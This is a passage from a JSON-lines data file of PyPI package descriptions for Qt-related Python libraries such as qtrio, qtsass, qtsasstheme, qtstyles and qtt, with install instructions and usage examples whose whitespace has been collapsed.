spacesKeep a space before/after a set of charactersReplace specific character with a spacesReplace a consecutive set of a specific characters with 1 spaceCounter:Insert numbers at the begining/end of the filenameReplace the filename with a unified nameSet a seperator between counter and filenameEnumerate:Start counter from a specific numbersCounter stepSet a separatorZero paddingExtra:Realtime previewSelective previewRename filename, extension or bothNavigate directories (folders): from the list, open dialog, type in completerfilter by extensionRename files / directories (folders) / subdirectories (sub-folders)Themes: default and dark (4 tones: blue, green, orange and pink)Undo renaming (only last one)Errors LogReport a bug - Request featurehttps://github.com/amad3v/QtRename/issuesScreenshotsDark theme (Linux):Default theme (Windows):ScreenshotsScreenshotsChangelog1.1.1:Fix treating directories as files when Process Extension is selected.Fix animation doesn't stop if RegEx is invalid.Fix no preview in some cases.Fixed error message shown multiple times.1.1.0:Fixed MVC bugsFixed folders/Files opened incrementallyAdjusted GUI for low resolution screensAdded french translationMinor improvements1.0.0:Initial releaseCopyright :copyright: 2020 - amad3v"} +{"package": "qtrer", "pacakge-description": "\u6839\u636e\u7ffb\u8bd1\u6587\u6863\u548cOPENCC(\u7b80\u4f53\u548c\u7e41\u4f53\u8f6c\u6362)\u5bf9Qt\u7ffb\u8bd1\u6587\u4ef6\u8fdb\u884c\u7ffb\u8bd1\u7684\u5c0f\u5de5\u5177"} +{"package": "qtrex", "pacakge-description": "qtrexQuery template rendering and execution library written in Python.The goal ofqtrexis to provide a simple API that supports loading.sqlfiles that can be templated withjinja, and provide extensible configuration\noptions to either compile the files, and execute the rendered templates against\nvarious databases.Getting Startedqtrexis installable athttps://pypi.org/project/qtrex/viapipusing:We currently only supportbigquery, but plan on adding other DB support as\noptional dependencies.pip install 'qtrex[bigquery]==0.0.5'ExamplesHere is a brief example usage ofqtrex.Assuming you have query templates in a directory on a local filesystem, using\nour test suite as an example:|tests\n |--test_*.py\n |--testdata\n |--mytemplate.sql\n |--ingest\n |--another_file_ext.j2\n |--another_query.sqlWhere./tests/testdata/mytemplate.sqlhas the following contents:SELECTSUM(x)FROMUNNEST({{params.test_array}})ASxand./tests/testdata/ingest/another_query.sqlhas:SELECT*FROM`{{params.my_project_id}}.{{params.my_dataset}}.{{params.my_table}}`and lastly,./tests/testdata/nested_params.sqlhas:SELECT{{params.test_dict_key.one}}+{{params.test_dict_key.two}}Next, we want to have our.yamlconfig (or extendqtrex.config.BaseConfig)\nto implement your own config mechanism.Our./tests/example.yamlwill look like:params:-key:test_string_keyvalue:\"string_value\"-key:test_array_keyvalue:[1,2,3]-key:test_dict_keyvalue:one:1two:2three:3We can now run the following script (./tests/example.py) after changing\ninto the./testsdirectoryfromqtrex.executorimportBigQueryExecutorfromqtrex.storeimportStorefromqtrex.configimportYAMLConfigdefmain():withopen(\"./example.yaml\",\"r\")asf:cfg=YAMLConfig(f)store=Store.from_path(cfg,\"./testdata\")ex=BigQueryExecutor()forquery_refinstore:print(f\"{query_ref.name}:{query_ref.template}\\n\")res=ex.execute(query_ref,dry_run=True)print(f\"results:{res}\")if__name__==\"__main__\":main()When we run this script:cd./tests\npythonexample.pywe should see the following instdoutmytemplate.sql: SELECT SUM(x)\nFROM UNNEST([1, 2, 3]) AS x\n\nresults: QueryResult(query_ref=QueryRef(filename='./testdata\\\\mytemplate.sql', template='SELECT SUM(x)\\nFROM UNNEST([1, 2, 3]) AS x', name='mytemplate.sql'), df=None, error=None)\nnested_params.sql: SELECT\n 1 + 2\n\nresults: QueryResult(query_ref=QueryRef(filename='./testdata\\\\nested_params.sql', template='SELECT\\n 1 + 2', name='nested_params.sql'), df=None, error=None)"} +{"package": "qtrf", "pacakge-description": "# qtrfWidgets for RF inputs written in Qt for Python (PySide6).## RequirementsPython 3PySide6ddtfor development and test only"} +{"package": "qtrio", "pacakge-description": "ResourcesDocumentationRead the DocsChatGitterForumDiscourseIssuesGitHubRepositoryGitHubTestsGitHub ActionsCoverageCodecovDistributionPyPIIntroductionNote:This library is in early development. It works. It has tests. It has\ndocumentation. Expect breaking changes as we explore a clean API. By paying this\nprice you get the privilege to provide feedback viaGitHub issuesto help shape our\nfuture.:]The QTrio project\u2019s goal is to bring the friendly concurrency of Trio using Python\u2019sasyncandawaitsyntax together with the GUI features of Qt to enable more\ncorrect code and a more pleasant developer experience. QTrio ispermissively licensedto avoid introducing\nrestrictions beyond those of the underlying Python Qt library you choose. Both PySide2\nand PyQt5 are supported.By enabling use ofasyncandawaitit is possible in some cases to write\nrelated code more concisely and clearly than you would get with the signal and slot\nmechanisms of Qt concurrency. In this set of small examples we will allow the user to\ninput their name then use that input to generate an output message. The user will be\nable to cancel the input to terminate the program early. In the first example we will\ndo it in the form of a classic \u201chello\u201d console program. Well, classic plus a bit of\nboilerplate to allow explicit testing without using special external tooling. Then\nsecond, the form of a general Qt program implementing this same activity. And finally,\nthe QTrio way.# A complete runnable source file with imports and helpers is available in# either the documentation readme examples or in the repository under# qtrio/examples/readme/console.py.defmain(input_file:typing.TextIO=sys.stdin,output_file:typing.TextIO=sys.stdout)->None:try:output_file.write(\"What is your name? \")output_file.flush()name=input_file.readline()[:-1]output_file.write(f\"Hi{name}, welcome to the team!\\n\")exceptKeyboardInterrupt:passNice and concise, including the cancellation viactrl+c. This is because we can\nstay in one scope thus using both local variables and atry/exceptblock. This\nkind of explodes when you shift into a classic Qt GUI setup.# A complete runnable source file with imports and helpers is available in# either the documentation readme examples or in the repository under# qtrio/examples/readme/qt.py.classMain:def__init__(self,application:QtWidgets.QApplication,input_dialog:typing.Optional[QtWidgets.QInputDialog]=None,output_dialog:typing.Optional[QtWidgets.QMessageBox]=None,):self.application=applicationifinput_dialogisNone:# pragma: no coverinput_dialog=create_input()ifoutput_dialogisNone:# pragma: no coveroutput_dialog=create_output()self.input_dialog=input_dialogself.output_dialog=output_dialogdefsetup(self)->None:self.input_dialog.accepted.connect(self.input_accepted)self.input_dialog.rejected.connect(self.input_rejected)self.input_dialog.show()definput_accepted(self)->None:name=self.input_dialog.textValue()self.output_dialog.setText(f\"Hi{name}, welcome to the team!\")self.output_dialog.finished.connect(self.output_finished)self.output_dialog.show()definput_rejected(self)->None:self.application.quit()defoutput_finished(self)->None:self.application.quit()The third example, below, shows how usingasyncandawaitallows us to\nreturn to the more concise and clear description of the sequenced activity.\nMost of the code is just setup for testability with only the last four lines\nreally containing the activity.# A complete runnable source file with imports and helpers is available in# either the documentation readme examples or in the repository under# qtrio/examples/readme/qtrio_example.py.asyncdefmain(*,task_status:trio_typing.TaskStatus[Dialogs]=trio.TASK_STATUS_IGNORED,)->None:dialogs=Dialogs()task_status.started(dialogs)withcontextlib.suppress(qtrio.UserCancelledError):name=awaitdialogs.input.wait()dialogs.output.text=f\"Hi{name}, welcome to the team!\"awaitdialogs.output.wait()"} +{"package": "qtrotate", "pacakge-description": "Quicktime/MP4 rotation tool============================.. image:: https://badge.fury.io/py/qtrotate.svg:target: https://badge.fury.io/py/qtrotateTool to read or change a new rotation meta of mp4 (Quicktime) files (e.g. from iphones and similar).Installation------------.. code-block:: bash$ pip install qtrotateQuickstart------------.. code-block:: pythonimport qtrotaterotation = qtrotate.get_set_rotation(file_path)From terminal------------.. code-block:: bash$ ./qtrotate.py myfile.mp4 # Read rotation from mp490$ ./qtrotate.py myfile2.mp4 -90 # Set rotation$ ./qtrotate.py myfile2.mp4270"} +{"package": "qtrunner", "pacakge-description": "\u4e2d\u6587\u8bf4\u660eintroductionrunneris aconfigurablequick launcher forstarting (running)commonly usedcommands (programs). It comes\nwith alogoutput interface, which is convenient for users toview (color)andsavelog. And the log output in a special\nformat can also drive the program to draw aprogress bar.main-uiinstallpip install -r requirements.txtonly tested on thewindwosplatform, recommended to use thepython 3.7version.start uppython runner.py - run from codebaserunner - run after installconfiguremain configuration fileconfig.json{\"maxLogLines\":1000,// max lines to view\"maxStdout\":40960,// max block of stdout\"defaultEncoding\":\"gbk\",// default stdout encodding\"configs\":[// sub configuration item{\"file\":\"runner_common.json\",// sub configuration file\"title\":\"\u901a\u7528(\u6d4b\u8bd5)\"// title in ui}]}sub configuration filerunner_xxxx.json[{\"title\":\"change codepage to gbk(use with caution)\",// title in ui\"cmd\":\"cmd /c chcp 936\",// command ling\"encoding\":\"gbk\",// output encoding\"qss\":\"color: rgb(150, 0, 0);\",// ui styles in qss format\"cwd\":\"\",// current working directory\"env\":{// environment variables\"GP_LANGUAGE\":\"zh_CN\"}}]"} +{"package": "qts", "pacakge-description": "ResourcesDocumentationRead the DocsIssuesGitHubRepositoryGitHubTestsGitHub ActionsDistributionPyPIIntroductionNoteqts is presently an exploratory project.\nIt does have test coverage and is significantly documented.\nIt only covers a few Qt modules.qts is a Qt5/6 and PyQt/PySide compatibility layer for your libraries and applications.\nIt is designed to work with mypy and includes a CLI utility to notify mypy of the needed conditions.\nTo keep the scope reasonable, qts will focus on the variances that all code using Qt will need such as imports and signals.\nNuanced detailed differences will not be abstracted away.\nHelper functions and similar may be provided on a case by case basis.importqtsimportqts.utildefmain():qts.set_wrapper(qts.available_wrappers()[0])fromqtsimportQtWidgetsapplication=QtWidgets.QApplication([])widget=QtWidgets.QLabel(\"this is qts\")widget.show()qts.util.exec(application)main()"} +{"package": "qtsass", "pacakge-description": "QtSASS: Compile SCSS files to Qt stylesheetsCopyright \u00a9 2015 Yann LanthonyCopyright \u00a9 2017\u20132018 Spyder Project ContributorsOverviewSASSbrings countless amazing features to CSS.\nBesides being used in web development, CSS is also the way to stylize Qt-based desktop applications.\nHowever, Qt's CSS has a few variations that prevent the direct use of SASS compiler.The purpose of this tool is to fill the gap between SASS and Qt-CSS by handling those variations.Qt's CSS specificitiesThe goal of QtSASS is to be able to generate a Qt-CSS stylesheet based on a 100% valid SASS file.\nThis is how it deals with Qt's specifics and how you should modify your CSS stylesheet to use QtSASS.\"!\" in selectorsQt allows to define the style of a widget according to its states, like this:QLineEdit:enabled{...}However, a \"not\" state is problematic because it introduces an exclamation mark in the selector's name, which is not valid SASS/CSS:QLineEdit:!editable{...}QtSASS allows \"!\" in selectors' names; the SASS file is preprocessed and any occurence of:!is replaced by:_qnot_(for \"Qt not\").\nHowever, using this feature prevents from having a 100% valid SASS file, so this support of!might change in the future.\nThis can be replaced by the direct use of the_qnot_keyword in your SASS file:QLineEdit:_qnot_editable{/* will generate QLineEdit:!editable { */...}qlineargradientThe qlineargradient function also has a non-valid CSS syntax.qlineargradient(x1:0,y1:0,x2:0,y2:1,stop:0.1blue,stop:0.8green)To support qlineargradient QtSASS provides a preprocessor and a SASS implementation of the qlineargradient function. The above QSS syntax will be replaced with the following:qlineargradient(0,0,0,1,(0.1blue,0.8green))You may also use this syntax directly in your QtSASS.qlineargradient(0, 0, 0, 1, (0.1 blue, 0.8 green))\n# the stops parameter is a list, so you can also use variables:\n$stops = 0.1 blue, 0.8 green\nqlineargradient(0, 0, 0, 0, $stops)qrgbaQt's rgba:rgba(255,128,128,50%)is replaced by CSS rgba:rgba(255,128,128,0.5)Executable usageTo compile your SASS stylesheet to a Qt compliant CSS file:# If -o is omitted, output will be printed to consoleqtsassstyle.scss-ostyle.cssTo use the watch mode and get your stylesheet auto recompiled on each file save:# If -o is omitted, output will be print to consoleqtsassstyle.scss-ostyle.css-wTo compile a directory containing SASS stylesheets to Qt compliant CSS files:qtsass./static/scss-o./static/cssYou can also use watch mode to watch the entire directory for changes.qtsass./static/scss-o./static/css-wSet the Environment Variable QTSASS_DEBUG to 1 or pass the --debug flag to enable logging.qtsass./static/scss-o./static/css--debugAPI methodscompile(string, **kwargs)Conform and Compile QtSASS source code to CSS.This function conforms QtSASS to valid SCSS before passing it to\nsass.compile. Any keyword arguments you provide will be combined with\nqtsass's default keyword arguments and passed to sass.compile.Examples:>>>importqtsass\n>>>qtsass.compile(\"QWidget {background: rgb(0, 0, 0);}\")QWidget{background:black;}Arguments:string: QtSASS source code to conform and compile.kwargs: Keyword arguments to pass to sass.compileReturns:Qt compliant CSS stringcompile_filename(input_file, output_file=None, **kwargs):Compile and return a QtSASS file as Qt compliant CSS. Optionally save to a file.Examples:>>>importqtsass\n>>>qtsass.compile_filename(\"dummy.scss\",\"dummy.css\")>>>css=qtsass.compile_filename(\"dummy.scss\")Arguments:input_file: Path to QtSass file.output_file: Path to write Qt compliant CSS.kwargs: Keyword arguments to pass to sass.compileReturns:Qt compliant CSS stringcompile_dirname(input_dir, output_dir, **kwargs):Compiles QtSASS files in a directory including subdirectories.>>>importqtsass\n>>>qtsass.compile_dirname(\"./scss\",\"./css\")Arguments:input_dir: Path to directory containing QtSass files.output_dir: Directory to write compiled Qt compliant CSS files to.kwargs: Keyword arguments to pass to sass.compileenable_logging(level=None, handler=None):Enable logging for qtsass.Sets the qtsass logger's level to:\n1. the provided logging level\n2. logging.DEBUG if the QTSASS_DEBUG envvar is a True value\n3. logging.WARNING>>>importlogging\n>>>importqtsass\n>>>handler=logging.StreamHandler()>>>formatter=logging.Formatter('%(level)-8s: %(name)s> %(message)s')>>>handler.setFormatter(formatter)>>>qtsass.enable_logging(level=logging.DEBUG,handler=handler)Arguments:level: Optional logging levelhandler: Optional handler to addwatch(source, destination, compiler=None, Watcher=None):Watches a source file or directory, compiling QtSass files when modified.The compiler function defaults to compile_filename when source is a file\nand compile_dirname when source is a directory.Arguments:source: Path to source QtSass file or directory.destination: Path to output css file or directory.compiler: Compile function (optional)Watcher: Defaults to qtsass.watchers.Watcher (optional)Returns:qtsass.watchers.Watcher instanceContributingEveryone is welcome to contribute!SponsorsSpyder and its subprojects are funded thanks to the generous support ofand the donations we have received from our users around the world throughOpen Collective:Please consider becoming a sponsor!"} +{"package": "qtsass310", "pacakge-description": "QtSASS: Compile SCSS files to Qt stylesheetsCopyright \u00a9 2015 Yann LanthonyCopyright \u00a9 2017\u20132018 Spyder Project ContributorsTHIS DISTRIBUTION IS DEPRECATEDUseqtsass>=0.3.1instead.OverviewSASSbrings countless amazing features to CSS.\nBesides being used in web development, CSS is also the way to stylize Qt-based desktop applications.\nHowever, Qt's CSS has a few variations that prevent the direct use of SASS compiler.The purpose of this tool is to fill the gap between SASS and Qt-CSS by handling those variations.Qt's CSS specificitiesThe goal of QtSASS is to be able to generate a Qt-CSS stylesheet based on a 100% valid SASS file.\nThis is how it deals with Qt's specifics and how you should modify your CSS stylesheet to use QtSASS.\"!\" in selectorsQt allows to define the style of a widget according to its states, like this:QLineEdit:enabled{...}However, a \"not\" state is problematic because it introduces an exclamation mark in the selector's name, which is not valid SASS/CSS:QLineEdit:!editable{...}QtSASS allows \"!\" in selectors' names; the SASS file is preprocessed and any occurence of:!is replaced by:_qnot_(for \"Qt not\").\nHowever, using this feature prevents from having a 100% valid SASS file, so this support of!might change in the future.\nThis can be replaced by the direct use of the_qnot_keyword in your SASS file:QLineEdit:_qnot_editable{/* will generate QLineEdit:!editable { */...}qlineargradientThe qlineargradient function also has a non-valid CSS syntax.qlineargradient(x1:0,y1:0,x2:0,y2:1,stop:0.1blue,stop:0.8green)To support qlineargradient QtSASS provides a preprocessor and a SASS implementation of the qlineargradient function. The above QSS syntax will be replaced with the following:qlineargradient(0,0,0,1,(0.1blue,0.8green))You may also use this syntax directly in your QtSASS.qlineargradient(0, 0, 0, 1, (0.1 blue, 0.8 green))\n# the stops parameter is a list, so you can also use variables:\n$stops = 0.1 blue, 0.8 green\nqlineargradient(0, 0, 0, 0, $stops)qrgbaQt's rgba:rgba(255,128,128,50%)is replaced by CSS rgba:rgba(255,128,128,0.5)Executable usageTo compile your SASS stylesheet to a Qt compliant CSS file:# If -o is omitted, output will be printed to consoleqtsassstyle.scss-ostyle.cssTo use the watch mode and get your stylesheet auto recompiled on each file save:# If -o is omitted, output will be print to consoleqtsassstyle.scss-ostyle.css-wTo compile a directory containing SASS stylesheets to Qt compliant CSS files:qtsass./static/scss-o./static/cssYou can also use watch mode to watch the entire directory for changes.qtsass./static/scss-o./static/css-wSet the Environment Variable QTSASS_DEBUG to 1 or pass the --debug flag to enable logging.qtsass./static/scss-o./static/css--debugAPI methodscompile(string, **kwargs)Conform and Compile QtSASS source code to CSS.This function conforms QtSASS to valid SCSS before passing it to\nsass.compile. Any keyword arguments you provide will be combined with\nqtsass's default keyword arguments and passed to sass.compile.Examples:>>>importqtsass\n>>>qtsass.compile(\"QWidget {background: rgb(0, 0, 0);}\")QWidget{background:black;}Arguments:string: QtSASS source code to conform and compile.kwargs: Keyword arguments to pass to sass.compileReturns:Qt compliant CSS stringcompile_filename(input_file, dest_file, **kwargs):Compile and save QtSASS file as Qt compliant CSS.Examples:>>>importqtsass\n>>>qtsass.compile_filename('dummy.scss','dummy.css')Arguments:input_file: Path to QtSass file.dest_file: Path to destination Qt compliant CSS file.kwargs: Keyword arguments to pass to sass.compilecompile_filename(input_file, output_file, **kwargs):Compile and save QtSASS file as Qt compliant CSS.Examples:>>>importqtsass\n>>>qtsass.compile_filename('dummy.scss','dummy.css')Arguments:input_file: Path to QtSass file.output_file: Path to write Qt compliant CSS.kwargs: Keyword arguments to pass to sass.compilecompile_dirname(input_dir, output_dir, **kwargs):Compiles QtSASS files in a directory including subdirectories.>>>importqtsass\n>>>qtsass.compile_dirname(\"./scss\",\"./css\")Arguments:input_dir: Path to directory containing QtSass files.output_dir: Directory to write compiled Qt compliant CSS files to.kwargs: Keyword arguments to pass to sass.compileenable_logging(level=None, handler=None):Enable logging for qtsass.Sets the qtsass logger's level to:\n1. the provided logging level\n2. logging.DEBUG if the QTSASS_DEBUG envvar is a True value\n3. logging.WARNING>>>importlogging\n>>>importqtsass\n>>>handler=logging.StreamHandler()>>>formatter=logging.Formatter('%(level)-8s: %(name)s> %(message)s')>>>handler.setFormatter(formatter)>>>qtsass.enable_logging(level=logging.DEBUG,handler=handler)Arguments:level: Optional logging levelhandler: Optional handler to addwatch(source, destination, compiler=None, Watcher=None):Watches a source file or directory, compiling QtSass files when modified.The compiler function defaults to compile_filename when source is a file\nand compile_dirname when source is a directory.Arguments:source: Path to source QtSass file or directory.destination: Path to output css file or directory.compiler: Compile function (optional)Watcher: Defaults to qtsass.watchers.Watcher (optional)Returns:qtsass.watchers.Watcher instanceContributingEveryone is welcome to contribute!SponsorsSpyder and its subprojects are funded thanks to the generous support ofand the donations we have received from our users around the world throughOpen Collective:Please consider becoming a sponsor!"} +{"package": "qtsasstheme", "pacakge-description": "qtsassthemeSet the Qt theme (e.g. darkgray/lightgray/darkblue/lightblue) easilyThis is using SCSS to set the light/dark theme to PyQt GUI, which is quite efficient.Old name of this isqt-sass-theme-getter.Setupgit clone ~(recommended)python -m pip install qtsasstheme- install as pypi package (good for test only)Using withpyinstallermake main.py inside the qtsasstheme directorypython -m PyInstaller main.py --add-data \"qt_sass_theme;./qt_sass_theme\"(if your main script is main.py)go to the dist/test folder and start the *.exe fileIncluded Packagesqtpy- support pyqt5/pyside2/pyqt6/pyside6qtsass- for converting sass into cssDetailed DescriptionMethod OverviewgetThemeFiles(theme: str = 'dark_gray', font=QFont('Arial', 9), background_darker=False, output_path=os.getcwd())Currently there are 4 official theme being supported:dark_graydark_bluelight_graylight_blueYou can also make your own theme withcustomizing theme.background_darkerdecides whether the background color is going to be darker than general widget color or not.If that is set toTrue, background color is darker than general widget color. See image below.If that is set toFalse(which is set by default), background color is lighter than general widget color. See image below.output_pathis the path that 'res' directory will be made which is holding a bunch of theme files after you calledgetThemeFiles.'res' directory looks like below.icodirectory holds icon files which will be being used in theme. For example, light icons will be being used in dark theme, dark icons will be being used in light theme._icons.scssmakes sass files insassdirectory refer to icons in this directory.sassdirectory holds the scss files which will be converted into css files.vardirectory holds the_variables.scsswhich contains the color(e.g. color of background/widget/border...) variables.setThemeFiles(main_window: QWidget, input_path='res')Right after callinggetThemeFiles, you can set the style with callingsetThemeFiles.After calling it, 'res' directory looks like this:scss files successfully convert into css files.Note: Don't change the current directory with function such asos.chdirafter callinggetThemeFilesand before callingsetThemeFiles.FileNotFoundErrorwill be most likely occurred.Customizing ThemeThere are two ways to customize theme.1. Giving color string togetThemeFilesYou can give the 6-digit hex string(e.g. #FF0000) togetThemeFiles'sthemeargument.In this case, widget's color will be set based on the hex color you given.This is the way how to do it://..app=QApplication(sys.argv)w=SampleWidget()g=QtSassTheme()g.getThemeFiles(theme='#6f495f')g.setThemeFiles(w)w.show()app.exec()2. Modify_variables.scss's color directlyThis is the way how to do it:CallinggetThemeFilesg=QtSassTheme()g.getThemeFiles()'res' directory like above will be generated. You can see_variables.scss.Change the variablesopen the_variables.scssand change the$bgcolor's value.This is_variables.scss's contents(dark-gray theme).$bgcolor:#555555;$widgetcolor:darken($bgcolor,10);$altwidgetcolor:lighten($widgetcolor,18);$textcolor:#DDDDDD;$hovercolor:lighten($widgetcolor,6);$bordercolor:lighten($widgetcolor,20);$selectcolor:darken($widgetcolor,6);$disabledcolor:#AAAAAA;$textwidgetcolor:darken($widgetcolor,12);$scrollhandlecolor:lighten($widgetcolor,30);$splitterhandlecolor:darken($widgetcolor,10);You can change any colors.In this example i will change the $bgcolor from #555555 to #006600(dark-green).CallingsetThemeFiles//..app=QApplication(sys.argv)w=SampleWidget()g=QtSassTheme()g.setThemeFiles(w)w.show()app.exec()ExampleCode SamplefromPyQt5.QtWidgetsimportQApplication# from PyQt6.QtWidgets import QApplication# from PySide2.QtWidgets import QApplication# from PySide6.QtWidgets import QApplicationfrompyqt_timer.settingsDialogimportSettingsDialogfromqt_sass_themeimportQtSassThemeif__name__==\"__main__\":importsysapp=QApplication(sys.argv)widget=SettingsDialog()g=QtSassTheme()g.getThemeFiles(theme='dark_gray')# g.getThemeFiles(theme='dark_blue') - if you want to set dark blue themeg.setThemeFiles(main_window=widget)widget.show()app.exec()ResultPreview widget ispyqt-timer's settings dialog.Dark gray themeDark blue themeLight gray themeLight blue theme"} +{"package": "qt-sass-theme-getter", "pacakge-description": "qt-sass-theme-getterSet the Qt theme (e.g. dark/light/darkblue/lightblue) easilyThis is using SCSS to set the light/dark theme to PyQt GUI, which is quite efficient.Setuppython -m pip install qt-sass-theme-getterIncluded Packagesqtsass- for converting sass into csspyqt-svg-button- for supporting svg buttonMethod OverviewgetThemeFiles(theme: str = 'dark', output_path=os.getcwd())Supporting theme:darkdark_bluelightlight_blueTheme files will be saved in 'res' directory ofoutput_pathafter you calledgetThemeFiles.'res' directory looks like this:icodirectory holds icon files which will be being used in theme. For example, light icons will be being used in dark theme, dark icons will be being used in light theme._icons.scssmakes sass files insassdirectory refer to icons in this directory.sassdirectory holds the scss files which will be converted into css files.vardirectory holds the_variables.scsswhich contains the color(e.g. color of background/widget/border...) variables. You can change the_variables.scss's variables whatever you want, if you want to set custom variables.setThemeFiles(main_window: QWidget, input_path='res', exclude_type_lst: list = [])Right after callinggetThemeFiles, you can set the style with callingsetThemeFiles.After calling it, 'res' directory looks like this:scss files successfully convert into css files.Note: Don't change the current directory with function such asos.chdirafter callinggetThemeFilesand before callingsetThemeFiles.FileNotFoundErrorwill be most likely occurred.ExampleCode SamplefromPyQt5.QtWidgetsimportQApplicationfrompyqt_timer.settingsDialogimportSettingsDialogfromqt_sass_theme_getterimportQtSassThemeGetterif__name__==\"__main__\":importsysapp=QApplication(sys.argv)widget=SettingsDialog()g=QtSassThemeGetter()g.getThemeFiles(theme='dark')# g.getThemeFiles(theme='dark_blue') - if you want to set dark blue themeg.setThemeFiles(main_window=widget)widget.show()app.exec_()ResultDark themeDark blue themeLight themeLight blue theme"} +{"package": "qtscompile", "pacakge-description": "your project readme"} +{"package": "qtsit", "pacakge-description": "No description available on PyPI."} +{"package": "qtsix", "pacakge-description": "QtSix provides a compatibility layer that allows to write Pythonapplications that work with different Qt bindings: PyQt5, PyQt4 orPySide.An application that used QtSix can work correctly if any of thesupported Qt bindings is installed on the system.QtSix automatically detects available bindings and uses themtransparently.If more than one Qt_ binding is present on the system then it is selectedthe first one available in the following order: PyQt5, PyQt4, PySide."} +{"package": "qtsnbl", "pacakge-description": "No description available on PyPI."} +{"package": "qtstrap", "pacakge-description": "QtStrap: Qt application bootstrapping frameworkQt is excellent, but it's also enormous. There's a lot of topics, and many of them have hidden gotchas. PySide2 and PyQt are also excellent, letting us leverage the powerful Qt libraries from up in the clouds in PythonLand, but this arrangement has its own gotchas.The goal of qtstrap is get your applications up and running quickly, so you can focus on your problem instead of on Qt's idiosyncracies.FeaturesMore complete docs are availablehere.qtstrapcommand line tool to bootstrap new projectscrossplatform makefile with useful development commandspreconfigured build system using PyInstaller and InnoSetupcustom Qt widgets with useful behaviorsPythonic layout system using ContextLayoutsSome other stuff I haven't remembered yetCustom WidgetsLabelEditHLineandVLineLinkLabelButtons:StateButtonIconToggleButtonConfirmToggleButtonMenuButtonPersistent Widgets (for rapid prototyping of saved data):PersistentCheckableActionPersistentCheckBoxPersistentComboBoxPersistentLineEditPersistentListWidgetPersistentPlainTextEditPersistentTabWidgetPersistentTextEditPersistentTreeWidgetUtility Classes and FunctionsAdapterTimeStampStringBuildercall_later()decorators:@accepts_file_drops@trace@singletoncontext managers:DeferSignalBlockerqtstrap.extras:CommandPalette, like VSCode or SublimeTextLogging Subsystem: log to local database + log viewer widgetsCodeEditor: Custom QTextEditor subclass customized for code editingDependenciesPython 3PySide2 or PyQt5Make(optional, but recommended)InstallationpipinstallqtstrapContributingContributions are always welcome. Feel free toopen an issueorstart a new discussionon our GitHub."} +{"package": "qtstyles", "pacakge-description": "[![Build Status](https://travis-ci.org/simongarisch/qtstyles.svg?branch=master)](https://travis-ci.org/simongarisch/qtstyles)[![Coverage Status](https://coveralls.io/repos/github/simongarisch/qtstyles/badge.svg?branch=master&service=github)](https://coveralls.io/github/simongarisch/qtstyles?branch=master)[![PyPI version](https://badge.fury.io/py/qtstyles.svg)](https://badge.fury.io/py/qtstyles)# qtstylesA collection of Qt Style Sheets accompanied by useful classes.## Installationqtstyles is python 2 and 3 compatible.```bashpip install qtstyles```## OverviewProvided are **Two ways** to change your Qt application style sheet:## 1. With the StylePicker classView available styles with:```pythonfrom qtstyles import StylePickerStylePicker().available_styles```And change the Qt application style using the get_sheet() method:```pythonfrom qtpy import QtWidgetsfrom qtstyles import StylePickerapp = QtWidgets.QApplication([])win = QtWidgets.QMainWindow()app.setStyleSheet(StylePicker(\"qdark\").get_sheet()) # <-- changing the style herewin.show()app.exec_()```## 2. We can also change the style sheet with an instance of StylePickerWidget (inherits from QComboBox)```pythonfrom qtpy import QtWidgetsfrom qtstyles import StylePickerWidgetapp = QtWidgets.QApplication([])win = QtWidgets.QMainWindow()picker_widget = StylePickerWidget() # <-- this QComboBox allows the user to change style sheetswin.setCentralWidget(picker_widget)win.show()app.exec_()```See the 'Overview Notebook.ipynb' for additional details.## MotivationWhen looking for Qt ('.qss') style sheets most were scattered across different sites.Disclaimer: I've collected these style sheets from different repositories and they are not my own work.Attribution, links and the associated licenses have been provided at the top of each qss file.If you'd like to add a style sheet please create a pull request and I'll be happy to take a look.## What does it look likeThe StylePickerWidget is in the bottom left hand side of this window:![qstyles demo](https://github.com/simongarisch/qtstyles/blob/master/demo.PNG?raw=true)"} +{"package": "qt-style-sheet-inspector", "pacakge-description": "Qt Style Sheet InspectorA inspector widget to view and modify style sheet of a Qt app in runtime.Free software: MIT licenseObservationIt need PyQt5 to work but it doesn\u2019t have it as a dependency, as testing with PyQt5 pypi proved\nunreliable (may be changed in the future).FeaturesCan view current style sheet of application during runtimeStyle sheet can be changed in runtime, facilitating the process of designing a custom GUIHas a search bar to help find specific types or namesCan undo/redo changesHistory0.1.0 (2016-09-28)First release."} +{"package": "qtstylish", "pacakge-description": "AboutThis package provides a modern light and dark theme for PyQt5. I made this because I was not satisfied with alternatives:qtmodernoverrides QPalette but I needed a purely stylesheet-based solutionQDarkStyleSheetandBreezeStyleSheetshad some visual bugs and a different aesthetic than what I wantedScreenshotsInstallationpip install qtstylishUsageimport qtstylish\nmy_widget.setStyleSheet(qtstylish.light())More InfoWorks best with app style set to FusionIcons are mostly modified fromhttps://github.com/microsoft/fluentui-system-iconsUses qtsass for compiling to QSShttps://github.com/spyder-ide/qtsassTook some SCSS & ideas fromhttps://github.com/ColinDuquesnoy/QDarkStyleSheetandhttps://github.com/Alexhuszagh/BreezeStyleSheetsAlternativesQDarkStyleSheetBreezeStyleSheets"} +{"package": "qtt", "pacakge-description": "WelcomeWelcome to the QTT framework. This README will shortly introduce the framework, and it will guide you through the structure, installation process and how to contribute. We look forward to working with you!Quantum Technology ToolboxQuantum Technology Toolbox (QTT) is a Python-based framework developed initially by QuTech for the tuning and calibration of\nquantum dots and spin qubits.QuTechis an advanced research center based in Delft, the Netherlands, for quantum\ncomputing and quantum internet, a collaboration founded by theUniversity of Technology Delft(TU Delft) and\nthe Netherlands Organisation for Applied Scientific Research (TNO).For usage of QTT see the detaileddocumentationon readthedocs.io.QTT is the framework on which you can base your measurement and analysis scripts. QTT is based\nonQCoDeS(basic framework such as instrument drivers, DataSet) and theSciPyecosystem.InstallationQTT is compatible with Python 3.8+. QTT can be installed as a pip package to be used in a (virtual) Python environment.\nWe assume that software packages likegitandpythonare already installed on your system.Note: when running Ubuntu Linux, installing these packages is done via:sudoaptinstallgitgccpython3.11python3.11-venvpython3.11-devfor Python 3.11.x. Other Linux distributions require similar steps.Setting up a virtual environmentTo create a clean virtual Python environment for your QTT development do:mkdirqttcdqttNow activate the virtual environment. On Linux do:python3-mvenvenv\n../env/bin/activateorsource./env/bin/activateOn Windows do:python-mpipinstallvirtualenv\npython-mvirtualenv--copiesenv\nenv\\Scripts\\activate.batNow we are ready to install QTT.Installation from PyPITo use QTT, install it as a pip package:pipinstallqttor install QTT from source.Installing from sourceThe source for QTT can be found at Github.\nFor the default installation from the QTT source directory execute:gitclonehttps://github.com/QuTech-Delft/qtt.gitcdqtt\npipinstallwheelFor QTT development install QTT in editable mode:pipinstall-e.For non-editable mode do:pipinstall.When 